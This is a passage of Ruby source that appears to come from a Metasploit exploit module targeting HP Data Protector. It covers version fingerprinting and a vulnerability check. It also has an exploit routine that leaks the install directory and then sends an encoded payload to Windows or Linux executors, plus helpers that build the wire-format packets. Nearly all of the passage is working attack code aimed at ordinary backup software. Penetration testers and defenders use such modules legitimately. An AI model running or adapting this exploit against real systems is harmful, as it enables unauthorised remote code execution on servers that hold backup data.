if fingerprint =~ /Data Protector A\.(\d+\.\d+)/
version = $1
vprint_status("#{peer} - Windows / HP Data Protector version #{version} found")
elsif fingerprint =~ / INET/
vprint_status("#{peer} - Linux / HP Data Protector found")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
if Gem::Version.new(version) <= Gem::Version.new('9')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Detected # there is no patch at the time of module writing
end
# Leaks the HP Data Protector install directory, falls back to the target's
# default when the leak cannot be parsed, then hands the encoded payload to
# the platform-specific executor chosen by the target name.
def exploit
  marker = rand_text_alpha(8)
  print_status("#{peer} - Leaking the HP Data Protector directory...")
  dir = parse_dir(leak_hp_directory(marker), marker)
  if dir.nil?
    dir = default_hp_dir
    print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}")
  elsif !valid_target?(dir)
    # The leaked path does not look like this target's platform; proceed regardless.
    print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
  end
  # Both branches announce the same thing, so say it once.
  print_status("#{peer} - Executing payload...")
  #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
  if target.name =~ /Windows/
    execute_windows(payload.encoded, dir)
  else
    execute_linux(payload.encoded, dir)
  end
end
# "host:port" label prefixed to every status and error message.
def peer
  [rhost, rport].join(':')
end
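# Builds one request packet: a big-endian 32-bit length, then a UTF-16LE BOM,
# then each field encoded with Rex::Text.to_unicode, terminated by a double
# NUL and separated from the next field by an encoded space.
#
# @param fields [Array<String>] request fields, in wire order
# @return [String] binary packet; the length prefix covers everything after
#   it, BOM included
def build_pkt(fields)
  separator = Rex::Text.to_unicode(" ").b
  # Work in binary from the start: the BOM bytes are not valid UTF-8, so
  # appending a field that contains non-ASCII bytes would otherwise raise
  # Encoding::CompatibilityError.
  data = "\xff\xfe".b
  pieces = fields.map { |v| "#{Rex::Text.to_unicode(v)}\x00\x00".b }
  data << pieces.join(separator)
  # The wire length counts bytes, not characters.
  [data.bytesize].pack("N") + data
end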
# Tries the Windows-style probe first and falls back to the Linux-style one.
#
# @return [String, nil] whichever probe produced a banner, or nil if neither did
def get_fingerprint
  get_fingerprint_windows || get_fingerprint_linux
end
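# Probes the service the way the Linux build answers: sends a 2-byte
# length-prefixed BOM and reads back a length-prefixed reply.
#
# @return [String, nil] the raw reply body, or nil when the peer closes,
#   resets, or answers with less than a full 4-byte length prefix
def get_fingerprint_linux
  connect
  sock.put([2].pack("N") + "\xff\xfe")
  begin
    header = sock.get_once(4)
    # A short or empty header carries no length; unpack would yield nil and
    # the next read would run with a nil size.
    return nil if header.nil? || header.length < 4
    # NOTE: the body length is chosen by the remote peer; get_once reads at
    # most that many bytes in one call.
    res = sock.get_once(header.unpack("N")[0])
  rescue ::Errno::ECONNRESET, EOFError
    # Same failure set as get_fingerprint_windows, so a reset peer yields
    # nil instead of an exception escaping check.
    return nil
  ensure
    disconnect
  end
  res
end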
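# Probes the service the way the Windows build answers: sends a random
# 64-byte uppercase string and reads back a length-prefixed reply.
#
# @return [String, nil] the reply converted with Rex::Text.to_ascii with the
#   trailing UTF-16 NUL removed, or nil when the peer closes, resets, or
#   answers with less than a full 4-byte length prefix
def get_fingerprint_windows
  connect
  sock.put(rand_text_alpha_upper(64))
  begin
    header = sock.get_once(4)
    # A short or empty header carries no length; unpack would yield nil and
    # the next read would run with a nil size.
    return nil if header.nil? || header.length < 4
    # NOTE: the body length is chosen by the remote peer; get_once reads at
    # most that many bytes in one call.
    res = sock.get_once(header.unpack("N")[0])
  rescue ::Errno::ECONNRESET, EOFError
    # A reset on either read is treated like EOF: no banner, not an error.
    return nil
  ensure
    disconnect
  end
  return nil if res.nil?
  Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
end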